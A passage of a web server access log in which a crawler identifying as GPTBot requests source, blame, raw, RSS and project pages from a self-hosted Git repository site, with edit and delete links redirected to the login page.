11712] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/projects.sln" +[17/Feb/2026:16:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fvite.config.ts" [Client 74.7.227.38] [Length 23710] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/vite.config.ts" +[17/Feb/2026:16:10:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore?display=source" [Client 74.7.227.38] [Length 12040] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" +[17/Feb/2026:16:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 11371] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor" +[17/Feb/2026:16:10:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:16:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=source" [Client 74.7.227.38] [Length 11979] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" +[17/Feb/2026:16:10:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/.gitignore" [Client 74.7.227.38] [Length 9800] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.gitignore" +[17/Feb/2026:16:10:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:26 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.gitignore" +[17/Feb/2026:16:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/.gitignore" [Client 74.7.227.38] [Length 10414] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 10373] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:16:10:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 995] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 75] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.gitignore" [Client 74.7.227.38] [Length 905] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.gitignore" [Client 74.7.227.38] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.gitignore" +[17/Feb/2026:16:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_new/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.gitignore" +[17/Feb/2026:16:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_new/main/.gitignore" +[17/Feb/2026:16:10:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_diffpatch/main/.gitignore" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/blame/branch/main/.gitignore" +[17/Feb/2026:16:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_diffpatch/main/.gitignore" +[17/Feb/2026:16:10:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/requirements.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:16:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:16:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:16:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=source" [Client 74.7.227.38] [Length 10985] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" +[17/Feb/2026:16:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10880] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.gitignore" +[17/Feb/2026:16:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10838] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:16:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py?display=source" [Client 74.7.227.38] [Length 16093] [Gzip 5.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:16:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 10884] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/nginx.conf" +[17/Feb/2026:16:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py?display=source" [Client 74.7.227.38] [Length 12967] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:16:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11055] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:10:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=reversealphabetically" [Client 74.7.227.38] [Length 5466] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" +[17/Feb/2026:16:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" +[17/Feb/2026:16:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7804] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" +[17/Feb/2026:16:10:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=recentupdate&state=open" [Client 74.7.227.38] [Length 7808] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" +[17/Feb/2026:16:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7800] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/projects" +[17/Feb/2026:16:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostissues&state=open" [Client 74.7.227.38] [Length 8501] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones" +[17/Feb/2026:16:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/projects?q=&sort=leastupdate&state=open" [Client 74.7.227.38] [Length 7803] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/projects" +[17/Feb/2026:16:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?q=&sort=leastcomplete&state=open" [Client 74.7.227.38] [Length 8510] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70927] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12049] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 2064] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" +[17/Feb/2026:16:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12048] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include" +[17/Feb/2026:16:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70930] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" [Client 74.7.227.38] [Length 70931] [Gzip 29.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:16:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=mostissues&state=open" +[17/Feb/2026:16:10:49 +0000] - 200 200 - GET https 